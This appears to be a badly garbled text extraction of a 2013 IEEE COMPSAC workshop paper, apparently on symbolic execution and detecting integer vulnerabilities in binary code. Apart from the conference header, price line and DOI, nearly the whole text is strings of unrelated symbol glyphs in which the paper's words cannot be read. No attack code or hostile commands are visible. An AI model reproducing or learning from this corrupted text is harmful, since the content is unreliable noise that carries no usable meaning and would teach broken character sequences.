✎ ❻ ✓ ✎ ❿ ✓ ❻ ✔ ✗❽ ❼ ➃ ✎ ➂ ✖ ➄ ✓ ➅ ✓ ➄ ✘ ➀ ✖ ✎ ✏ ✕ ➄ ➄ ✘ ❻ ✕ ➀ ✓ ➂ ❽ ❻ ✓ ➄ ✎ ❻ ❾ ✗ ➀ ✒ ✓ ➁ ✕ ➀ ✒➄ ✎ ✏ ✗➀ ❻ ✕ ✖ ✏ ➀ ✗ ➊ ✒ ✖ ➄ ✒ ➄ ✕ ✏➍
✘ ❻ ➀ ✒ ✓ ❻ ➃ ✓ ✘ ✗✓ ❾ ➀ ✎ ❾ ✓ ➀ ✓ ❻ ❼ ✖ ✏ ✓➍
✓ ✕ ✗✖ ➃ ✖ ➂ ✖ ➀ ❽✎➍
➁ ✕ ➀ ✒5 4
✏ ❻ ✓ ➄ ✓ ✏ ➀ ❽ ✓ ✕ ❻ ✗ ✔ ➀ ✒ ✓ ❻ ✓ ✕ ❻ ✓ ✖ ❼ ➁ ✎ ❻ ➀ ✕ ✏ ➀ ✕ ➁ ➁ ➂ ✖ ➄ ✕ ➀ ✖ ✎ ✏ ✗ ✕ ✏ ❾❻ ✓ ✗ ✓ ✕ ❻ ➄ ✒ ➁ ❻ ✎ ✑ ❻ ✓ ✗✗➆ ➐ ➈ ✔ ➆ ➑ ➈ ✔ ➆ ➒ ➈ ✔ ➆ ➓ ➈ ✖ ✏ ➀ ✓ ❻ ❼ ✗ ✎➍
➄ ✎ ❾ ✓ ❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ➌✖ ➀ ❽ ❾ ✓ ➀ ✓ ➄ ➀ ✖ ✎ ✏ ➃ ✕ ✗ ✓ ❾ ✎ ✏ ✗❽ ❼ ➃ ✎ ➂ ✖ ➄ ✓ ➅ ✓ ➄ ✘ ➀ ✖ ✎ ✏5 ➔
✎ ➊ ✓ ❿ ✓ ❻ ✔ ✎ ✏ ✓ ✎➍➀ ✒ ✓ ❼ ✎ ✗➀ ✖ ❼ ➁ ✎ ❻ ➀ ✕ ✏ ➀ ❾ ✖➍ ➎
➄ ✘ ➂ ➀ ✖ ✓ ✗ ✖ ✗ ✘ ✏ ✕ ❿ ✎ ✖ ❾ ✕ ➃ ➂ ✓ ➁ ✕ ➀ ✒ ✓ ➅ ➁ ➂ ✎ ✗✖ ✎ ✏➁ ❻ ✎ ➃ ➂ ✓ ❼5
❺ ✒ ✓ ✏ ✘ ❼ ➃ ✓ ❻ ✎➍
➁ ❻ ✎ ✑ ❻ ✕ ❼ ✓ ➅ ✓ ➄ ✘ ➀ ✖ ✎ ✏ ➁ ✕ ➀ ✒ ✗ ✑ ❻ ✎ ➊ ✗ ✕ ✗➍
✕ ✗➀ ✕ ✗ ➁ ❻ ✎ ✑ ❻ ✕ ❼ ✗✖ → ✓ ✓ ➅ ➁ ✎ ✏ ✓ ✏ ➀ ✖ ✕ ➂5
➣ ✒ ✓ ✏ ✕ ➁ ➁ ➂ ❽ ✖ ✏ ✑ ✗❽ ❼ ➃ ✎ ➂ ✖ ➄✓ ➅ ✓ ➄ ✘ ➀ ✖ ✎ ✏ ➀ ✎ ❾ ✓ ➀ ✓ ➄ ➀ ➂ ✕ ❻ ✑ ✓ ✗ ➄ ✕ ➂ ✓ ✎➍
➁ ❻ ✎ ✑ ❻ ✕ ❼✔ ➁ ✕ ➀ ✒ ✓ ➅ ➁ ➂ ✎ ✗✖ ✎ ✏➁ ❻ ✎ ➃ ➂ ✓ ❼ ✖ ✗ ❼ ✎ ❻ ✓ ✗ ✓ ❻ ✖ ✎ ✘ ✗5↔ ➄ ➄ ✎ ❻ ❾ ✖ ✏ ✑ ➀ ✎➔
✓ ❾ ➂ ❽ ✓ ➀ ✕ ➂5
➆ ↕ ➈ ➇ ➉5
➒ ➙ ✎➍
✕ ➂ ➂ ➀ ✒ ✓ ➁ ✕ ➀ ✒ ✗ ✕ ❻ ✓✖ ✏➍
✓ ✕ ✗✖ ➃ ➂ ✓5 4 ➍
❼ ✕ ✏ ❽ ✖ ✏➍
✓ ✕ ✗✖ ➃ ➂ ✓ ➁ ✕ ➀ ✒ ✗ ➄ ✕ ✏ ➃ ✓ ❾ ✓ ➀ ✓ ➄ ➀ ✓ ❾ ❾ ✘ ❻ ✖ ✏ ✑✗➀ ✕ ➀ ✖ ➄ ✕ ✏ ✕ ➂ ❽ ✗✖ ✗ ✔ ✖ ➀ ➊ ✖ ➂ ➂ ✑ ❻ ✓ ✕ ➀ ➂ ❽ ✖ ❼ ➁ ❻ ✎ ❿ ✓ ➀ ✒ ✓ ➁ ✓ ❻➍
✎ ❻ ❼ ✕ ✏ ➄ ✓ ✎➍❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ✖ ➀ ❽ ❾ ✓ ➀ ✓ ➄ ➀ ✖ ✎ ✏5
↔➍
➀ ✓ ❻ ✕ ✏ ✕ ➂ ❽ → ✖ ✏ ✑ ➄ ✕ ❻ ✓➍
✘ ➂ ➂ ❽ ➀ ✒ ✓➍
✕ ➄ ➀ ✎ ❻ ✗➀ ✒ ✕ ➀ ➂ ✓ ✕ ❾ ➀ ✎ ➁ ✕ ➀ ✒ ✓ ➅ ➁ ➂ ✎ ✗✖ ✎ ✏ ✔ ➊ ✓ ❾ ✖ ✗ ➄ ✎ ❿ ✓ ❻ ➀ ✒ ✕ ➀ ✓ ❻ ❻ ✎ ❻ ✒ ✕ ✏ ➌❾ ➂ ✖ ✏ ✑ ❼ ✎ ❾ ✘ ➂ ✓ ✗ ✑ ✓ ✏ ✓ ❻ ✕ ➀ ✓ ❼✘ ➄ ✒ ➁ ✎ ❻ ➀ ✖ ✎ ✏ ✎➍
➊ ✒ ✎ ➂ ✓ ➁ ✕ ➀ ✒ ✗ ➊ ✒ ✓ ✏➀ ❻ ✕ ❿ ✓ ❻ ✗✖ ✏ ✑ ➁ ❻ ✎ ✑ ❻ ✕ ❼ ✗➀ ✕ ➀ ✓ ✗5
❙ ✘ ➄ ✒ ➄ ✒ ✓ ➄ ➋ ✗ ✕ ❻ ✓ ➁ ❻ ✓ ❿ ✕ ➂ ✓ ✏ ➀ ✖ ✏ ❻ ✓ ✕ ➂
➁ ❻ ✎ ✑ ❻ ✕ ❼5
➛ ✎ ❻ ✓ ➅ ✕ ❼ ➁ ➂ ✓ ✔ ➊ ✒ ✓ ✏➍
✘ ✏ ➄ ➀ ✖ ✎ ✏ ✖ ✏ ➁ ✘ ➀ ✗ ✕ ❻ ✓ ✏ ✎ ➀ ➁ ❻ ✎ ➁ ✓ ❻ ✔➀ ✒ ✓ ➁ ❻ ✎ ✑ ❻ ✕ ❼ ➊ ✖ ➂ ➂ ❻ ✓ ➀ ✘ ❻ ✏ ✗✎ ❼✓ ✓ ❻ ❻ ✎ ❻ ➜ ✕ ✑ ❿ ✕ ➂ ✘ ✓ ✔ ✎ ✘ ➀ ➁ ✘ ➀ ✓ ❻ ❻ ✎ ❻❼✓ ✗✗✕ ✑ ✓ ➀ ✎ ➀ ✒ ✓ ✗ ➄ ❻ ✓ ✓ ✏ ✔ ➁ ✎ ➁ ➌ ✘ ➁ ➊ ✖ ✏ ❾ ✎ ➊ ✕ ✏ ❾ ✗✎ ✎ ✏5 ➝
✏ ✓➄ ✎ ❼❼ ✎ ✏ ➀ ❽ ➁ ✓ ✎➍
➀ ✒ ✓ ✗ ✓ ➄ ✒ ✓ ➄ ➋ ✗ ✖ ✗ ✑ ✘ ✕ ❻ ❾ ✖ ✏ ✑ ✕ ✑ ✕ ✖ ✏ ✗➀ ✖ ✏ ➀ ✓ ✑ ✓ ❻✎ ❿ ✓ ❻ ➜ ✎ ➊ ➆➞
➈5 ➟
✗➁ ✓ ➄ ✖ ✕ ➂ ➂ ❽ ✖ ✏ ➀ ❽ ➁ ✓ ✗ ✎➍
❾ ✎ ➄ ✘ ❼✓ ✏ ➀ ➁ ❻ ✎ ➄ ✓ ✗✗✖ ✏ ✑➂ ✖ ➃ ❻ ✕ ❻ ❽ ✔ ➃ ✓ ➄ ✕ ✘ ✗ ✓ ❼ ✎ ✗➀ ✎➍ ➍
✎ ❻ ❼ ✕ ➀ ✗ ✕ ❻ ✓ ❿ ✓ ❻ ❽ ➄ ✎ ❼ ➁ ➂ ✓ ➅ ✔ ➀ ✒ ✓ ✗ ✓➎
➂ ✓ ✗ ➄ ✎ ✏ ➀ ✕ ✖ ✏ ✗ ✕ ✏ ✘ ❼ ➃ ✓ ❻ ✎➍
✓ ❻ ❻ ✎ ❻ ➌ ✒ ✕ ✏ ❾ ➂ ✖ ✏ ✑ ➃ ❻ ✕ ✏ ➄ ✒ ✓ ✗5❉ ✓ ➀ ✕ ✖ ➂ ✓ ❾ ✗➀ ✘ ❾ ❽ ✎➍
✖ ✏ ➀ ✓ ✑ ✓ ❻ ✓ ❻ ❻ ✎ ❻ ✗ ✖ ✏ ❈ ✎ ❼❼ ✎ ✏ ➠ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ➌✖ ➀ ✖ ✓ ✗ ✕ ✏ ❾➟
➅ ➁ ✎ ✗ ✘ ❻ ✓ ✗ ➡ ❈ ➠➟
➢ ➆ ➤ ➈ ✗ ✘ ✑ ✑ ✓ ✗➀ ✗ ➀ ✒ ✕ ➀ ➀ ✒ ✓ ➁ ❻ ✎ ➃ ✕ ➃ ✖ ➂ ✖ ➀ ❽✎➍
✖ ✏ ➀ ✓ ✑ ✓ ❻ ❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ✖ ➀ ❽ ✖ ✗ ❿ ✓ ❻ ❽ ➂ ✎ ➊ ✖ ✏ ✏ ✎ ✏ ➌➍
✕ ➀ ✕ ➂ ✓ ❻ ❻ ✎ ❻ ✒ ✕ ✏ ➌❾ ➂ ✖ ✏ ✑ ➡➥
➛➟ ➔
➢ ➃ ❻ ✕ ✏ ➄ ✒ ✓ ✗5
❉ ✓ ➀ ✕ ✖ ➂ ✗ ✕ ➃ ✎ ✘ ➀➥
➛➟ ➔
✖ ✗ ✖ ✏ ✗ ✓ ➄ ➀ ✖ ✎ ✏4 4
➌ ↔5
➣ ✓➍
✎ ➄ ✘ ✗ ✎ ✏ ❾ ✓ ➀ ✓ ➄ ➀ ✖ ✏ ✑ ❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ✖ ➀ ✖ ✓ ✗ ✎➍
➂ ✕ ❻ ✑ ✓ ✗ ➄ ✕ ➂ ✓➃ ✖ ✏ ✕ ❻ ❽ ➄ ✎ ❾ ✓ ❻ ✕ ➀ ✒ ✓ ❻ ➀ ✒ ✕ ✏ ✗✎ ✘ ❻ ➄ ✓ ➄ ✎ ❾ ✓5
❈ ✎ ❼ ➁ ✕ ❻ ✓ ➀ ✎ ✗✎ ✘ ❻ ➄ ✓➄ ✎ ❾ ✓ ✔ ✕ ✏ ✕ ➂ ❽ → ✖ ✏ ✑ ➃ ✖ ✏ ✕ ❻ ❽ ➄ ✎ ❾ ✓ ✖ ✗ ➄ ✎ ❼❼ ✎ ✏ ➂ ❽ ➄ ✎ ✏ ✗✖ ❾ ✓ ❻ ✓ ❾ ✕ ✗✕ ➄ ✒ ✕ ➂ ➂ ✓ ✏ ✑ ✖ ✏ ✑ ➀ ✕ ✗ ➋ ❾ ✘ ✓ ➀ ✎ ✖ ➀ ✗ ➄ ✎ ❼ ➁ ➂ ✓ ➅ ✖ ➀ ❽ ✕ ✏ ❾ ➀ ✒ ✓ ➂ ✕ ➄ ➋ ✎➍✒ ✖ ✑ ✒ ✓ ❻ ➌ ➂ ✓ ❿ ✓ ➂ ✗ ✓ ❼ ✕ ✏ ➀ ✖ ➄ ✖ ✏➍
✎ ❻ ❼ ✕ ➀ ✖ ✎ ✏5
➣ ✓ ➁ ❻ ✓ ✗ ✓ ✏ ➀ ➀ ✒ ❻ ✓ ✓ ➁ ✕ ➀ ➀ ✓ ❻ ✏ ✗➀ ✎ ❻ ✓ ➄ ✎ ✑ ✏ ✖ → ✓➥
➛➟ ➔
❼ ✎ ❾ ✘ ➂ ✓ ✗ ✖ ✏ ➃ ✖ ✏ ✕ ❻ ❽ ➄ ✎ ❾ ✓5
↔ ✏ ❾ ➊ ✓ ➁ ❻ ✎ ❿ ✖ ❾ ✓✗✖ ✑ ✏ ✖➎
➄ ✕ ✏ ➀ ✗➀ ✕ ➀ ✖ ✗➀ ✖ ➄ ✕ ➂ ✓ ❿ ✖ ❾ ✓ ✏ ➄ ✓ ✗ ➀ ✎ ✗ ✘ ➁ ➁ ✎ ❻ ➀ ➀ ✒ ✓ ❿ ✕ ➂ ✖ ❾ ✖ ➀ ❽ ✎➍✓ ✕ ➄ ✒ ➁ ✕ ➀ ➀ ✓ ❻ ✏5
❈ ✎ ❼ ➁ ✕ ❻ ✓ ❾ ➀ ✎ ✎ ➀ ✒ ✓ ❻ ➀ ✎ ✎ ➂ ✗ ✔ ➀ ✒ ✓ ✗ ✓➥
➛➟ ➔
➃ ❻ ✕ ✏ ➄ ✒ ✓ ✗➄ ✕ ✏ ✏ ✎ ➀ ➃ ✓ ✓ ➅ ➄ ➂ ✘ ❾ ✓ ❾➍
❻ ✎ ❼ ✓ ➅ ✖ ✗➀ ✖ ✏ ✑ ❼✓ ➀ ✒ ✎ ❾ ✗ ✔ ➂ ✖ ➋ ✓➍
✘ ✏ ➄ ➀ ✖ ✎ ✏➀ ✕ ✖ ✏ ➀ ✕ ✏ ✕ ➂ ❽ ✗✖ ✗➆ ➓ ➈ ✔ ✘ ✏ ✖ ➀ ➄ ✎ ❿ ✓ ❻ ❼✓ ➀ ✒ ✎ ❾ ➆ ➇ ➦ ➈ ✕ ✏ ❾ ❾ ✖➍ ➍
✓ ❻ ✓ ✏ ➀ ➁ ❻ ✎ ➌✑ ❻ ✕ ❼ ✗➀ ✕ ➀ ✓ ❼✓ ➀ ✒ ✎ ❾ ➆ ➇ ➇ ➈5❺ ✒ ✓ ➄ ✎ ✏ ➀ ❻ ✖ ➃ ✘ ➀ ✖ ✎ ✏ ✎➍
➀ ✒ ✖ ✗ ➁ ✕ ➁ ✓ ❻ ✖ ✗ ✗ ✘ ❼❼ ✕ ❻ ✖ → ✓ ❾ ✖ ✏ ➀ ✒ ✓➍
✎ ➂ ➂ ✎ ➊ ✖ ✏ ✑➍
✎ ✘ ❻ ➁ ✎ ✖ ✏ ➀ ✗5➇ ➢ ➣ ✓ ❾ ✓ ✗ ➄ ❻ ✖ ➃ ✓ ➀ ✒ ❻ ✓ ✓ ➁ ✕ ➀ ➀ ✓ ❻ ✏ ✗ ➀ ✎ ❻ ✓ ➄ ✎ ✑ ✏ ✖ → ✓➥
➛➟ ➔
➁ ✕ ➀ ✒ ✗✖ ✏ ➃ ✖ ✏ ✕ ❻ ❽ ➄ ✎ ❾ ✓5➉ ➢ ➣ ✓ ➁ ❻ ✎ ➁ ✎ ✗ ✓ ✕ ➁ ❻ ✘ ✏ ✖ ✏ ✑ ✕ ➂ ✑ ✎ ❻ ✖ ➀ ✒ ❼ ➄ ✕ ➂ ➂ ✓ ❾➟
➧ ❺ ➃ ✕ ✗ ✓ ❾ ✎ ✏➥
➛➟ ➔
❻ ✓ ➄ ✎ ✑ ✏ ✖ ➀ ✖ ✎ ✏5➐ ➢ ➣ ✓ ✖ ❼ ➁ ➂ ✓ ❼✓ ✏ ➀ ✕ ➁ ❻ ✎ ➀ ✎ ➀ ❽ ➁ ✓ ➀ ✎ ✎ ➂ ➄ ✕ ➂ ➂ ✓ ❾➨
❻ ✘ ✏➟
➃ ➀ ✕ ✏ ❾ ✘ ✗ ✓✖ ➀ ➀ ✎ ✕ ✏ ✕ ➂ ❽ → ✓ ❻ ✓ ✕ ➂ ➌ ➊ ✎ ❻ ➂ ❾ ➃ ✖ ✏ ✕ ❻ ✖ ✓ ✗5 ➟
➅ ➁ ✓ ❻ ✖ ❼✓ ✏ ➀ ✕ ➂ ❻ ✓ ✗ ✘ ➂ ➀ ✗✗ ✒ ✎ ➊ ➀ ✒ ✕ ➀➨
❻ ✘ ✏➟
➃ ➀ ✖ ✗ ➃ ✎ ➀ ✒ ✕ ➄ ➄ ✘ ❻ ✕ ➀ ✓ ✕ ✏ ❾ ✓➍ ➍
✓ ➄ ➀ ✖ ❿ ✓➀ ✎ ✖ ❾ ✓ ✏ ➀ ✖➍
❽➥
➛➟ ➔
➁ ✕ ➀ ✒ ✗ ✖ ✏ ➃ ✖ ✏ ✕ ❻ ❽ ➄ ✎ ❾ ✓5 ➏
✎ ❻ ✓ ✎ ❿ ✓ ❻ ✔➨
❻ ✘ ✏➟
➃ ➀ ➄ ✕ ✏ ✓➍ ➍
✓ ➄ ➀ ✖ ❿ ✓ ➂ ❽ ❻ ✓ ➂ ✖ ✓ ❿ ✓ ➁ ✕ ➀ ✒ ✓ ➅ ➁ ➂ ✎ ✗✖ ✎ ✏ ➁ ❻ ✎ ➃ ➂ ✓ ❼➊ ✖ ➀ ✒ ✎ ✘ ➀ ✎ ❼ ✖ ✗✗✖ ✎ ✏ ✗ ✎➍
❿ ✘ ➂ ✏ ✓ ❻ ✕ ➃ ✖ ➂ ✖ ➀ ✖ ✓ ✗5➑ ➢4
❾ ✓ ✏ ➀ ✖➍
❽ ✎ ✏ ✓ → ✓ ❻ ✎ ➌ ❾ ✕ ❽ ✖ ✏ ➀ ✓ ✑ ✓ ❻ ➃ ✘ ✑ ✖ ✏ ➊ ✖ ❾ ✓ ➂ ❽ ✘ ✗ ✓ ❾✖ ❼ ✕ ✑ ✓ ❻ ✓ ➄ ✎ ✑ ✏ ✖ ➀ ✖ ✎ ✏ ➂ ✖ ➃ ❻ ✕ ❻ ❽ ➂ ✖ ➃ ➁ ✏ ✑ ❿ ➇5
➒5
➇ ➐ ➆ ➇ ➉ ➈54 4 5 ➔
➩❶ 8 ❹
➫7 ❹ ❷
➭ ➯7
➲ ➭8 ❶ 6 ❹ 6
➳ ➯ ➵ ➳9 8 ❹ 7
➲ ➸ ➺ ➯ ➫ ➩10 9 6➩8 8 9 8
➲ ➯6 10
➵❹ 6
➳ ➭ ➯7 7
➩8 6 8
➩❷ 9
➳6 ❹ 7 ❹ 9 6❆ ✴➻
✣ ✙ ✣ ★ ✧➼ ➽
★ ✜ ✙ ✫ ✜➽ ➼
✣➨
✕ ➀ ✒ ➌ ➃ ✕ ✗ ✓ ❾ ✕ ➁ ➁ ❻ ✎ ✕ ➄ ✒ ✓ ✗ ✕ ❻ ✓ ➃ ✘ ✖ ➂ ➀ ✘ ➁ ✎ ✏ ➀ ✒ ✓ ✖ ❾ ✓ ✕ ✎➍
➁ ✕ ➀ ✒➁ ❻ ✓ ❾ ✖ ➄ ✕ ➀ ✓ ➆ ➇ ➦ ➈5
❺ ✒ ✓ ➃ ✕ ✗✖ ➄ ❼✓ ➀ ✒ ✎ ❾ ➀ ✎ ✓ ➅ ➁ ➂ ✎ ❻ ✓ ➀ ✒ ✓ ➁ ❻ ✎ ✑ ❻ ✕ ❼2013 IEEE 37th Annual Computer Software and Applications Conference Workshops
978-0-7695-4987-3/13 $26.00 © 2013 IEEE
DOI 10.1109/COMPSACW.2013.1495

❡ 1 ❡   ✁ ✂ ✄ ☎ ✆ ♣ ✝ ✂ ✞ ✄ ✐ ✂ ✞ ❡ ❞ ❡ ♣ ✂ ✞ ✟ ✠ ✡ ✐ ✂ ✐❡ ✝ ✡   ✞ ✭ ☛ ☞ ✌ ✍ ✐ ✂ ✡ ✝ ✂ ❡ ❣ ✎ ✏ ✑ ✒ ✓ ✔❚
✞ ❡♠
☎ ✐ ✂ ✐✄ ❣ ✆ ✄ ✠   ✝ ✆ ✂ ✐   ✝s
✝✕
✄s
✄ ✂ ✎   ✞ ✝s s
❡ ✆ ❣ ❡ ☎♦
✂ ✞ ❡ ☛ ☞ ✌✐ ✂ ✡ ✝ ✂ ❡ ❣ ✎ ✄ ✐ ✞ ☎✇
✂ ☎ ✞ ✝ ✆ ❞s
❡ ✂ ✞ ❡ ❡ 1 ♣ ☎ ✆ ❡ ✆ ✂ ✄ ✝s
✆ ✁♠ ✕
❡ ✡ ☎♦
♣ ✝ ✂ ✞ ✐ ✄ ✆✂ ✞ ❡ ♣ ✡ ☎ ❣ ✡ ✝♠
❞ ✁ ❡ ✂ ☎   ☎ ✆ ❞ ✄ ✂ ✄ ☎ ✆ ✐ ✔ ❍ ☎✇
❡ ✈ ❡ ✡ ✱   ☎ ✈ ❡ ✡ ✄ ✆ ❣ ✝s s
♣ ✝ ✂ ✞ ✐☎♦
✝ ♣ ✡ ☎ ❣ ✡ ✝♠
✄ ✐ ✆ ☎ ✂ ✂ ✞ ❡ ♣ ✡ ✄♠
✝ ✡ ✎ ☎✕
✖ ❡   ✂ ✄ ✈ ❡ ✔ ☞ ☎ ✡ ❡ 1 ✝♠
♣s
❡ ✱♦
☎ ✡✂ ❡ ✐ ✂ ✄ ✆ ❣ ✝ ✸ ✗ ✟   ✞ ✝ ✡ ✝   ✂ ❡ ✡ ♣ ✝ ✂ ✂ ❡ ✡ ✆ ✟♠
✝ ✂   ✞ ✄ ✆ ❣♦
✁ ✆   ✂ ✄ ☎ ✆ ✱✇
❡♠
✝ ✎☎ ✆s
✎♦
☎   ✁ ✐ ☎ ✆ ✝ ✂ ❡ ✐ ✂   ✝ ✐❡ ✂ ✞ ✝ ✂♠
✝ ✂   ✞ ❡ ✐ ✝ ❣ ✄ ✈ ❡ ✆ ♣ ✝ ✂ ✂ ❡ ✡ ✆ ✱✇
✞ ✄s
❡✆ ☎ ✂✕
❡ ✄ ✆ ✂ ❡ ✡ ❡ ✐ ✂ ❡ ❞ ✄ ✆ ✂ ✞ ❡ ✡ ❡ ✐ ✂ ☎♦
✂ ✞ ❡ ❡ 1 ♣ ☎ ✆ ❡ ✆ ✂ ✄ ✝s
✆ ✁♠ ✕
❡ ✡ ☎♦♣ ☎ ✐✐✄✕ s
❡   ☎♠✕
✄ ✆ ✝ ✂ ✄ ☎ ✆ ✐ ✔❆ ♦
✂ ❡ ✡ ✝ ✆ ✝s
✎❛
✄ ✆ ❣   ✝ ✡ ❡♦
✁s s
✎ ✂ ✞ ❡♦
✝   ✂ ☎ ✡ ✐ ✂ ✞ ✝ ✂s
❡ ✝ ❞ ✂ ☎ ♣ ✝ ✂ ✞❡ 1 ♣s
☎ ✐✄ ☎ ✆ ✱✇
❡ ❞ ✄ ✐   ☎ ✈ ❡ ✡ ✂ ✞ ✝ ✂ ❡ ✡ ✡ ☎ ✡ ✞ ✝ ✆ ❞s
✄ ✆ ❣ ✏ ✑ ✸ ✓♠
☎ ❞ ✁s
❡ ✐❣ ❡ ✆ ❡ ✡ ✝ ✂ ❡♠
✁   ✞ ♣ ☎ ✡ ✂ ✄ ☎ ✆ ☎♦ ✇
✞ ☎s
❡ ♣ ✝ ✂ ✞ ✐ ✄ ✆ ✐✎♠ ✕
☎s
✄   ❡ 1 ❡   ✁ ✂ ✄ ☎ ✆ ✔❚
✞ ❡ ✡ ❡ ✝ ✡ ❡ ✂✇
☎ ✂ ✎ ♣ ❡ ✐ ☎♦
❡ ✡ ✡ ☎ ✡ ✞ ✝ ✆ ❞s
✄ ✆ ❣ ✄ ✆ ☎ ✁ ✡ ❞ ❡ ✠ ✆ ✄ ✂ ✄ ☎ ✆ ✐ ✔☞ ✄ ✡ ✐ ✂ ✂ ✎ ♣ ❡ ✄ ✐♦
✝ ✂ ✝s
❡ ✡ ✡ ☎ ✡ ✞ ✝ ✆ ❞s
✄ ✆ ❣   ☎ ✆ ✂ ✝ ✄ ✆ ✄ ✆ ❣ ✂ ✞ ❡   ☎ ❞ ❡ ✂ ☎ ✐ ✂ ☎ ♣✂ ✞ ❡ ✡ ✁ ✆ ✆ ✄ ✆ ❣ ☎♦
✂ ✞ ❡✇
✞ ☎s
❡ ♣ ✡ ☎ ❣ ✡ ✝♠
✱s
✄❧
❡ ❡ 1 ✄ ✂ ✭ ✍ ✝ ✆ ❞ ✝✕
☎ ✡ ✂ ✭ ✍✄ ✆ ❈ ♣ ✡ ☎ ❣ ✡ ✝♠
✔ ◆ ☎ ✆ ✟ ✆ ☎ ✡♠
✝s
❡ 1 ✄ ✂ ☎♦
✂ ❡ ✆♠
❡ ✝ ✆ ✐ ✂ ✞ ✝ ✂ ♣ ✡ ☎ ❣ ✡ ✝♠❡ ✆   ☎ ✁ ✆ ✂ ❡ ✡ ❡ ❞ ✝ ✈ ❡ ✡ ✎ ✐❡ ✡ ✄ ☎ ✁ ✐♠
✄ ✐ ✂ ✝❧
❡ ✂ ✞ ✝ ✂ ♣ ✡ ☎ ❣ ✡ ✝♠ ✇
☎ ✁s
❞ ✆ ☎ ✂✡ ❡   ☎ ✈ ❡ ✡ ✔ ■♦
✂ ✞ ✝ ✂ ✞ ✝ ♣ ♣ ❡ ✆ ✐ ✱ ✂ ✞ ❡ ♣ ☎ ✐✐✄✕
✄s
✄ ✂ ✎ ☎♦
✄ ✆ ✂ ❡ ❣ ❡ ✡✕
✁ ❣ ✐ ✂ ❡ ✆ ❞ ✐✂ ☎✕
❡ ✞ ✄ ❣ ✞ ✔ ■ ✆ ✐❡   ☎ ✆ ❞ ✂ ✎ ♣ ❡ ✱ ✂ ✞ ❡ ♣ ✡ ☎ ❣ ✡ ✝♠
❞ ☎ ❡ ✐ ✆ ☎ ✂ ✂ ❡ ✡♠
✄ ✆ ✝ ✂ ❡✂ ✞ ❡ ✡ ✁ ✆ ✆ ✄ ✆ ❣ ☎♦
  ☎ ❞ ❡✕
✁ ✂✇
✝ ✡ ✆ ✄ ✆ ✝♠
✄s
❞♠
✝ ✆ ✆ ❡ ✡ ✭ ✆ ☎ ✆ ✟♦
✝ ✂ ✝s
❡ ✡ ✡ ☎ ✡ ✞ ✝ ✆ ❞s
✄ ✆ ❣ ✱ ◆ ☞✘
❍ ✍ ✔ ■ ✂♠
✝ ✎ ✡ ❡ ✂ ✁ ✡ ✆ ✐☎♠
❡ ❡ ✡ ✡ ☎ ✡➈
✝ ❣✈ ✝s
✁ ❡ ✱ ☎ ✁ ✂ ♣ ✁ ✂ ❡ ✡ ✡ ☎ ✡♠
❡ ✐✐ ✝ ❣ ❡ ✂ ☎ ✐   ✡ ❡ ❡ ✆ ✝ ✆ ❞ ♣ ☎ ♣ ✟ ✁ ♣✇
✄ ✆ ❞ ☎✇✇
✞ ❡ ✆ ✄ ✆ ♣ ✁ ✂ ✐ ✝ ✡ ❡ ✆ ☎ ✂ ✝ ♣ ♣ ✡ ☎ ♣ ✡ ✄ ✝ ✂ ❡♦
☎ ✡♠
✝ ✂ ✂ ❡ ❞ ✔❚
✞ ❡ ✐❡   ☎ ✆ ❞✂ ✎ ♣ ❡ ✝ ♣ ♣ ❡ ✝ ✡ ✐   ☎♠♠
☎ ✆s
✎✕
❡   ✝ ✁ ✐❡ ♣ ✡ ☎ ❣ ✡ ✝♠
☎♦
✂ ❡ ✆ ✂ ✝❧
❡♠
✁   ✞❡♦ ♦
☎ ✡ ✂ ✂ ☎ ❞ ❡ ✝s ✇
✄ ✂ ✞ ✄♠
♣ ✡ ☎ ♣ ❡ ✡ ✄ ✆ ♣ ✁ ✂ ✔❲
❡ ✠ ✆ ❞ ✂ ✞ ✝ ✂ ✄ ✆ ✂ ❡ ❣ ❡ ✡✕
✁ ❣♣ ✡ ☎✕
✝✕
✄s
✄ ✂ ✎ ✄ ✆ ◆ ☞✘
❍ ✄ ✐ ✈ ❡ ✡ ✎s
☎✇
✄ ✆ ✡ ❡ ✝s
♣ ✡ ☎ ❣ ✡ ✝♠
✔✶ ✙ ✚ ✛ ✜ ✢ ✙ ✚ ✛ ✣ ✤ ✙ ✚ ✛ 2 ✥ ✦✷ ✙ ✧ ✢ ✣ ★ ✩ ✪ ✪ 2 ★ ✩ ✥ ✦ ✴✯
❝ ✫ ✬ ❝ ✮ ✙ ✚ ✰ ✲ ✛✯
✴✳
✰✵
✙ ✚ ✛ ✧ ✢✹
✲ ✚✺
✲ ✰✻ ✵
✛ ✧✻ ✵ ❢ ✼
✛✹
✥✽✾ ✵
✬ ✛ ✲✵
✚✿ ✽ ❀❁
2❂ ❂ ✽❃ 3 ❄ ❅✯
✣✽❇ ❉ ✧ ✢ ✣ ❊ ❄ 2 ✥ ✦❋ ❉ ✧ ✢ 3 ❄ ❄ ✣❂
● ✥❏ ✼ ❑ ✻ ✵
✛ ✢ ✥✽✶▲ ❀✶ ✶✵
✬ ✛ ✲✵
✚ ✩✽ ❀▼ ❖ P ◗ ❘❙
✶❯ ❱ ❳ ❙ ❨ ❩ ❬ ❭ ❪ ❙ ❫ ❭ ❘ ❴ P ❘❩ ❬■ ✆ ✂ ✞ ✄ ✐ ♣ ✝ ♣ ❡ ✡ ✱✇
❡ ♣ ✡ ☎ ♣ ☎ ✐❡ ✝ ✆ ❡✇ ❧
✄ ✆ ❞ ☎♦
✐❡ ✝ ✡   ✞ ✐ ✂ ✡ ✝ ✂ ❡ ❣ ✎  ✝s s
❡ ❞✘ ❵
✌ ✱✕
✎ ✆ ☎ ✂ ✝ ♣ ♣s
✎ ✄ ✆ ❣ ✐✎♠ ✕
☎s
✄   ❡ 1 ❡   ✁ ✂ ✄ ☎ ✆ ✂ ☎ ◆ ☞✘
❍✕
✡ ✝ ✆   ✞ ❡ ✐ ✭ ◆ ☞✘
❍❵
✍ ✔✘ ❵
✌ ✄ ✐ ❞ ❡ ✐   ✡ ✄✕
❡ ❞ ✄ ✆❆ s
❣ ☎ ✡ ✄ ✂ ✞♠
✑ ✔ ☞ ☎ ✡❡ 1 ✝♠
♣s
❡ ✱ ✄ ✆ ✂ ✞ ❡ ❡ 1 ✝♠
♣s
❡ ☎♦
